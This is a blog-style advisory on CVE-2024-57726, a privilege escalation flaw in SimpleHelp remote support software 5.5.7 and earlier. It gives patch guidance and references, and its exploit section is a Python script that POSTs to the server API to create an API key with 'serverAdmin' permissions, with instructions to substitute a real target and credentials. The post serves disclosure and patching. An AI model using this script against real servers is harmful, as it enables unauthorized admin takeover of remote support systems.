CVE-2024-57726 - Escalation of Privileges Vulnerability in SimpleHelp Remote Support Software v5.5.7 and Earlier

Attention SimpleHelp users! If you're using SimpleHelp remote support software version 5.5.7 or earlier, it's time to update. A recently discovered vulnerability, dubbed CVE-2024-57726, allows low-privileges technicians to escalate their privileges to server admin level by creating API keys with excessive permissions. This post will cover the details of this vulnerability, share some code snippets illustrating the exploit, and provide links to the original references for those who require more information.

Vulnerability Details

SimpleHelp is a remote desktop support solution that allows technicians to provide remote assistance to end-users. In versions 5.5.7 and earlier, there's a security vulnerability that allows low-privileges technicians to create API keys with excessive permissions. These keys can then be used to escalate the technician's privileges to the server admin role, potentially allowing them to perform malicious actions, such as accessing sensitive data, modifying configurations or even causing denial of service.

Exploit Details

To exploit this vulnerability, a low-privilege technician first needs access to the SimpleHelp server. Once they have access, they can craft an HTTP request to create an API key with excessive permissions.

Here's a code snippet demonstrating this exploit

import requests

url = "https://example.simple-help.com/api/xml?action=create_api_key";
headers = {
    "Authorization": "Basic dGVzdC91c2VyOnRlc3RwYXNz", # Replace with base64-encoded credentials
    "Content-Type": "application/x-www-form-urlencoded",
}
data = {
    "name": "Exploit Key",
    "permissions": "serverAdmin",
}

response = requests.post(url, headers=headers, data=data)

if response.status_code == 200:
    print("API key creation successful!")
    print(response.content)
else:
    print("API key creation failed. Error: ", response.status_code)

In this snippet, replace the example URL with the target SimpleHelp server's URL and use base64-encoded credentials of the low-privileges technician account in the 'Authorization' header. The exploit will attempt to create an API key with 'serverAdmin' privileges. If successful, the API key creation response will contain the new API key with excessive permissions.

Mitigation

To prevent exploitation of this vulnerability, the recommended action is to update SimpleHelp to the latest version. According to the SimpleHelp release notes, this vulnerability has been patched in version 5.5.8:

> "5.5.8 - Fixed a privilege escalation vulnerability in the API that could be exploited to generate API credentials with higher-than-anticipated permissions."

You can download the latest version of SimpleHelp from their official website: https://simple-help.com/download

Original References

1. SimpleHelp Release Notes (see version 5.5.8 for the fix): https://simple-help.com/releases
2. CVE Details: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-57726

In conclusion, if you're using SimpleHelp remote support software v5.5.7 or earlier, it's crucial to update your software to the latest version to mitigate the risk associated with CVE-2024-57726 vulnerability. By doing so, you can assure the security of your remote support services and prevent unauthorized escalation of privileges.

Timeline

Published on: 01/15/2025 23:15:09 UTC
Last modified on: 01/31/2025 21:15:11 UTC